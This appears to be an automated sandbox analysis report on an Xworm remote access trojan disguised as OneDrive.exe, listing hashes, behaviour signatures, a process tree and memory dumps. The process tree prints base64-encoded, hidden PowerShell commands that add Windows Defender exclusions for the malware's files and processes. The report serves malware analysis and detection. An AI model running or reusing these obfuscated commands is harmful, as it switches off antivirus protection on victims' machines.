Analysis

  • max time kernel
    49s
  • max time network
    57s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/09/2024, 19:20

General

  • Target

    OneDrive.exe

  • Size

    270.2MB

  • MD5

    8a1d83bd60b0bf8b9ab7aa48951023e8

  • SHA1

    af1fa47081d87d972b970851a6a55bcdd5db2050

  • SHA256

    fb4b4f1d5eff5554690fef39a65a76255e6c5587ddc98499ab3a7850b507cbfd

  • SHA512

    b4042b8b17c75af7984e06678efd871c1670bba74ca07b403bb0a03497e804905f2d0a72c022071f836605bf1cb95884672cdcd1d62111a7ea5f203e43e89d9f

  • SSDEEP

    6291456:mHqyRktm833OwpWtAmlVKllT1wpzVX97XBf7ekh6PAGU:nyRkthewpWtxlV21wppX97RF64T

Malware Config

Signatures

  • Detect Xworm Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3400
      • C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
        "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3700
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4956
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Users\Admin\AppData\Local\Temp\ihdvap.exe
          "C:\Users\Admin\AppData\Local\Temp\ihdvap.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVQBzAGUAQQB0AHQAcgBpAGIAdQB0AGUAXABJAHMAUgBlAGEAZABPAG4AbAB5AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVQBzAGUAQQB0AHQAcgBpAGIAdQB0AGUAXABJAHMAUgBlAGEAZABPAG4AbAB5AC4AZQB4AGUA
      1⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4804

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            c1224fa10ae91e4523b644dee8093784

            SHA1

            192fd598898ffa5768ccf692682a5b5af61a3f28

            SHA256

            fd737aa9ba072502d942dce969f35eaec7ce10fbd356c1b11f6ac6b85d6fb9c7

            SHA512

            12fd801395333806d2cb74ac3f7eb7d3df35c0a6084f3ae577aa42a28b44beea008b7e9963ddb9427aaa28e7969689fbc37bff632ab08facd72f699552d62982

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_re2lu5ve.yt3.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\ihdvap.exe

            Filesize

            715KB

            MD5

            ab48b511e80c2f9545c9956ce04e53c5

            SHA1

            563edd19acca56b7e330e1fe2bd342c99aabb243

            SHA256

            d5f8f486001f017a278f35e67cc40aebea3d76dd261920ef097af6876ca87e81

            SHA512

            bfddf9225d798940f04f3b62724cbca69dfb49b13be1380ec85fe2cfeb10e175c327f13f28236c3add61a731daf9283f442e2d6ac21368d4b42f075429f657c1

          • memory/3700-1087-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/3700-20-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-4-0x0000000005B50000-0x0000000005C3E000-memory.dmp

            Filesize

            952KB

          • memory/3700-14-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-12-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-28-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-24-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-32-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-40-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-68-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-67-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-61-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-58-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-54-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-52-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-50-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-48-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-46-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-44-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-42-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-38-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-36-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-34-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-65-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-1108-0x00000000746EE000-0x00000000746EF000-memory.dmp

            Filesize

            4KB

          • memory/3700-56-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-30-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-26-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-22-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-1109-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/3700-18-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-16-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-10-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-8-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-6-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-5-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-1079-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/3700-1080-0x0000000005D30000-0x0000000005D98000-memory.dmp

            Filesize

            416KB

          • memory/3700-1081-0x0000000005CD0000-0x0000000005D1C000-memory.dmp

            Filesize

            304KB

          • memory/3700-1085-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/3700-1086-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/3700-2-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/3700-63-0x0000000005B50000-0x0000000005C38000-memory.dmp

            Filesize

            928KB

          • memory/3700-0-0x00000000746EE000-0x00000000746EF000-memory.dmp

            Filesize

            4KB

          • memory/3700-3-0x00000000057C0000-0x0000000005996000-memory.dmp

            Filesize

            1.8MB

          • memory/3700-1138-0x0000000003110000-0x0000000003164000-memory.dmp

            Filesize

            336KB

          • memory/3700-1141-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/3700-1137-0x0000000018780000-0x0000000018D24000-memory.dmp

            Filesize

            5.6MB

          • memory/3700-1-0x0000000000E10000-0x0000000000FF4000-memory.dmp

            Filesize

            1.9MB

          • memory/4300-1148-0x00000000066B0000-0x0000000006742000-memory.dmp

            Filesize

            584KB

          • memory/4300-1147-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4300-1146-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4300-1145-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4300-5157-0x00000000074D0000-0x00000000074DC000-memory.dmp

            Filesize

            48KB

          • memory/4300-1144-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4300-1142-0x0000000000400000-0x000000000042C000-memory.dmp

            Filesize

            176KB

          • memory/4300-1143-0x0000000005640000-0x00000000056DC000-memory.dmp

            Filesize

            624KB

          • memory/4504-1160-0x0000026A7E770000-0x0000026A7E828000-memory.dmp

            Filesize

            736KB

          • memory/4504-1161-0x0000026A7F8A0000-0x0000026A7F9AA000-memory.dmp

            Filesize

            1.0MB

          • memory/4504-5156-0x0000026A19480000-0x0000026A194D6000-memory.dmp

            Filesize

            344KB

          • memory/4804-5158-0x0000019136670000-0x0000019136692000-memory.dmp

            Filesize

            136KB

          • memory/4956-1106-0x0000000006390000-0x00000000063AE000-memory.dmp

            Filesize

            120KB

          • memory/4956-1100-0x0000000005D30000-0x0000000005D96000-memory.dmp

            Filesize

            408KB

          • memory/4956-1125-0x0000000007D00000-0x000000000837A000-memory.dmp

            Filesize

            6.5MB

          • memory/4956-1126-0x00000000076C0000-0x00000000076DA000-memory.dmp

            Filesize

            104KB

          • memory/4956-1127-0x0000000007730000-0x000000000773A000-memory.dmp

            Filesize

            40KB

          • memory/4956-1128-0x0000000007940000-0x00000000079D6000-memory.dmp

            Filesize

            600KB

          • memory/4956-1129-0x00000000078C0000-0x00000000078D1000-memory.dmp

            Filesize

            68KB

          • memory/4956-1130-0x00000000078F0000-0x00000000078FE000-memory.dmp

            Filesize

            56KB

          • memory/4956-1131-0x0000000007900000-0x0000000007914000-memory.dmp

            Filesize

            80KB

          • memory/4956-1132-0x0000000007A00000-0x0000000007A1A000-memory.dmp

            Filesize

            104KB

          • memory/4956-1107-0x00000000063D0000-0x000000000641C000-memory.dmp

            Filesize

            304KB

          • memory/4956-1110-0x0000000006990000-0x00000000069C2000-memory.dmp

            Filesize

            200KB

          • memory/4956-1105-0x0000000005EC0000-0x0000000006214000-memory.dmp

            Filesize

            3.3MB

          • memory/4956-1124-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-1094-0x0000000005CC0000-0x0000000005D26000-memory.dmp

            Filesize

            408KB

          • memory/4956-1093-0x0000000005C20000-0x0000000005C42000-memory.dmp

            Filesize

            136KB

          • memory/4956-1092-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-1091-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-1090-0x00000000055A0000-0x0000000005BC8000-memory.dmp

            Filesize

            6.2MB

          • memory/4956-1088-0x0000000004DC0000-0x0000000004DF6000-memory.dmp

            Filesize

            216KB

          • memory/4956-1111-0x000000006FC90000-0x000000006FCDC000-memory.dmp

            Filesize

            304KB

          • memory/4956-1122-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-1089-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-1123-0x00000000075A0000-0x0000000007643000-memory.dmp

            Filesize

            652KB

          • memory/4956-1121-0x0000000006950000-0x000000000696E000-memory.dmp

            Filesize

            120KB

          • memory/4956-1133-0x00000000079E0000-0x00000000079E8000-memory.dmp

            Filesize

            32KB

          • memory/4956-1136-0x00000000746E0000-0x0000000074E90000-memory.dmp

            Filesize

            7.7MB